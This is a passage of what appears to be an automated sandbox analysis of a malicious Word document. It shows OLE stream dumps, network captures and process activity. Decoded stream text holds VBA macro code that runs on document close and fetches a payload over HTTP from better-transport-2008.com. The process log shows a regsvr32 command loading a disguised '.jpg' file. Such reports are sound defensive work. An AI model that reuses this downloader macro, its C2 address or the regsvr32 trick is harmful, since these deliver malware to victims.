                                                                                                                                                  Data Raw:00 04 20 00 08 0c 00 0c 01 00 00 00 01 00 00 00 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 2c 00 00 00 00 01 68 6f 00 00 24 00 e5 01 00 00 08 00 00 80 01 00 00 00 58 03 00 00 00 00 17 00 54 65 78 74 42 6f 78 31 34 02 00 00 1a 01 00 00
                                                                                                                                                  Stream Path: UserForm1/o, File Type: data, Stream Size: 856
                                                                                                                                                  General
                                                                                                                                                  Stream Path:UserForm1/o
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:856
                                                                                                                                                  Entropy:5.78040237389
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . 8 . . . @ . . . . . . H . . . . . . . . . . { . . . S u b a u t o c l o s e ( ) . . d o w n l o a d . . e x e c u t e . . E n d S u b . . . . S u b d o w n l o a d ( ) . . . . S e t x m l h t t p = C r e a t e O b j e c t ( " m i c r o s o f t . x m l h t t p " ) . . x m l h t t p . O p e n " G E T " , " h t t p : / / b e t t e r - t r a n s p o r t - 2 0 0 8 . c o m / b i j o l / d V 6 T 3 i G 7 z Y Y N / G d U b 2 h c o K h 0 i 1 6 j t B 3 A 2 H 0 N A 1 h p c / 7 4 6 8
                                                                                                                                                  Data Raw:00 02 38 03 01 01 40 80 00 00 00 00 1b 48 80 ac 1d 03 00 80 ec 09 00 00 7b 02 00 00 53 75 62 20 61 75 74 6f 63 6c 6f 73 65 28 29 0d 0a 20 20 20 20 64 6f 77 6e 6c 6f 61 64 0d 0a 20 20 20 20 65 78 65 63 75 74 65 0d 0a 45 6e 64 20 53 75 62 0d 0a 0d 0a 53 75 62 20 64 6f 77 6e 6c 6f 61 64 28 29 0d 0a 0d 0a 53 65 74 20 78 6d 6c 68 74 74 70 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28
                                                                                                                                                  Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4855
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:4855
                                                                                                                                                  Entropy:4.66602075705
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                                                  Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                  Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2486
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_0
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:2486
                                                                                                                                                  Entropy:3.64532699898
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ N . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . W
                                                                                                                                                  Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                                  Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 214
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_1
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:214
                                                                                                                                                  Entropy:1.76333029747
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                  Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 348
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_2
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:348
                                                                                                                                                  Entropy:1.78667786328
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 0b 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 41 0c
                                                                                                                                                  Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 106
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/__SRP_3
                                                                                                                                                  File Type:data
                                                                                                                                                  Stream Size:106
                                                                                                                                                  Entropy:1.35911194617
                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                  Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                  Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 00 00 00 00 00 00 62 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00
                                                                                                                                                  Stream Path: VBA/dir, File Type: Tower/XP rel 3 object not stripped - version 18435, Stream Size: 1172
                                                                                                                                                  General
                                                                                                                                                  Stream Path:VBA/dir
                                                                                                                                                  File Type:Tower/XP rel 3 object not stripped - version 18435
                                                                                                                                                  Stream Size:1172
                                                                                                                                                  Entropy:6.62532484228
                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                  Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . | b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                                                                                                                                                  Data Raw:01 90 b4 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 06 bb 7c 62 0f 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 28, 2021 17:53:44.786062002 CEST4971080192.168.2.545.142.215.160
                                                                                                                                                  Apr 28, 2021 17:53:44.855005026 CEST804971045.142.215.160192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:44.855154037 CEST4971080192.168.2.545.142.215.160
                                                                                                                                                  Apr 28, 2021 17:53:44.855736017 CEST4971080192.168.2.545.142.215.160
                                                                                                                                                  Apr 28, 2021 17:53:44.923049927 CEST804971045.142.215.160192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:45.297656059 CEST804971045.142.215.160192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:45.298316002 CEST4971080192.168.2.545.142.215.160
                                                                                                                                                  Apr 28, 2021 17:53:50.303154945 CEST804971045.142.215.160192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:50.304030895 CEST4971080192.168.2.545.142.215.160
                                                                                                                                                  Apr 28, 2021 17:53:56.430592060 CEST4971080192.168.2.545.142.215.160

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Apr 28, 2021 17:53:30.874490976 CEST5378453192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:30.925375938 CEST53537848.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:31.511425972 CEST6530753192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:31.511853933 CEST6434453192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:31.561132908 CEST53643448.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:31.573415041 CEST6206053192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:31.585130930 CEST53653078.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:31.622153997 CEST53620608.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:32.602096081 CEST6180553192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:32.653616905 CEST53618058.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:33.699693918 CEST5479553192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:33.749295950 CEST53547958.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:34.211718082 CEST4955753192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:34.271522999 CEST53495578.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:34.778029919 CEST6173353192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:34.831298113 CEST53617338.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:36.422395945 CEST6544753192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:36.476030111 CEST53654478.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:38.167542934 CEST5244153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:38.219259977 CEST53524418.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:39.495086908 CEST6217653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:39.589145899 CEST53621768.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:40.201677084 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:40.280931950 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:41.209798098 CEST6529653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:41.211311102 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:41.261423111 CEST53652968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:41.282182932 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:42.227437973 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:42.276070118 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:42.989947081 CEST6318353192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:43.047410011 CEST53631838.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:43.937576056 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:43.997072935 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:44.029372931 CEST5696953192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:44.089503050 CEST53569698.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:44.243268013 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:44.300282001 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:44.715724945 CEST5516153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:44.775250912 CEST53551618.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:44.945919991 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:45.003277063 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:45.948122978 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:46.005336046 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:47.952606916 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:48.011315107 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:48.042252064 CEST5475753192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:48.096286058 CEST53547578.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:48.243958950 CEST5959653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:48.305047989 CEST53595968.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:48.872380972 CEST4999253192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:48.922638893 CEST53499928.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:53:51.968785048 CEST6015153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:53:52.026160002 CEST53601518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:02.007973909 CEST6007553192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:02.070261002 CEST53600758.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:07.338835955 CEST5501653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:07.387577057 CEST53550168.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:17.810230017 CEST6434553192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:17.873986959 CEST53643458.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:36.566135883 CEST5712853192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:36.623500109 CEST53571288.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:37.176513910 CEST5479153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:37.235939026 CEST53547918.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:37.803473949 CEST5046353192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:37.863825083 CEST53504638.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:38.089435101 CEST5039453192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:38.146418095 CEST53503948.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:38.461846113 CEST5853053192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:38.519911051 CEST53585308.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:39.147217989 CEST5381353192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:39.196208954 CEST53538138.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:39.769923925 CEST6373253192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:39.818856955 CEST53637328.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:40.271285057 CEST5734453192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:40.331155062 CEST53573448.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:41.071149111 CEST5445053192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:41.128385067 CEST53544508.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:42.502276897 CEST5926153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:42.562767982 CEST53592618.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:42.980550051 CEST5715153192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:43.029457092 CEST53571518.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:54:44.660398960 CEST5941353192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:54:44.721771002 CEST53594138.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:55:21.990047932 CEST6051653192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:55:22.038893938 CEST53605168.8.8.8192.168.2.5
                                                                                                                                                  Apr 28, 2021 17:55:23.760679960 CEST5164953192.168.2.58.8.8.8
                                                                                                                                                  Apr 28, 2021 17:55:23.827646017 CEST53516498.8.8.8192.168.2.5

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Apr 28, 2021 17:53:44.715724945 CEST192.168.2.58.8.8.80xc3d3Standard query (0)better-transport-2008.comA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Apr 28, 2021 17:53:44.775250912 CEST8.8.8.8192.168.2.50xc3d3No error (0)better-transport-2008.com45.142.215.160A (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • better-transport-2008.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.54971045.142.215.16080C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Apr 28, 2021 17:53:44.855736017 CEST1436OUTGET /bijol/dV6T3iG7zYYN/GdUb2hcoKh0i16jtB3A2H0NA1hpc/74683/46747/72864/44SSv8NGhJXy5fQxaupfdO8M/ZJEB/17780/qJ9lstoLuZrOY/laka4?page=iiJKK2MrmsRueKNRXFWZCo9SOGKZ&user=hIf0d5tRMn7urFpIay3&q=gV91M4&sid=cwv4FzNMjZLFugtW1lxjgH314&search=KCgMbDFMHNTY94w5RXElHoTs HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Language: en-us
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                  Host: better-transport-2008.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Apr 28, 2021 17:53:45.297656059 CEST1440INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 28 Apr 2021 15:53:44 GMT
                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
                                                                                                                                                  X-Powered-By: PHP/7.2.34
                                                                                                                                                  Content-Length: 204
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 6c 61 6b 61 34 22 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL "laka4" was not found on this server.</p></body></html>


                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  General

                                                                                                                                                  Start time:17:53:38
                                                                                                                                                  Start date:28/04/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                  Imagebase:0x1000000
                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:53:43
                                                                                                                                                  Start date:28/04/2021
                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                  Imagebase:0x1000000
                                                                                                                                                  File size:1937688 bytes
                                                                                                                                                  MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:53:45
                                                                                                                                                  Start date:28/04/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:regsvr32 c:\programdata\argumentSelectTmp.jpg
                                                                                                                                                  Imagebase:0x9d0000
                                                                                                                                                  File size:20992 bytes
                                                                                                                                                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >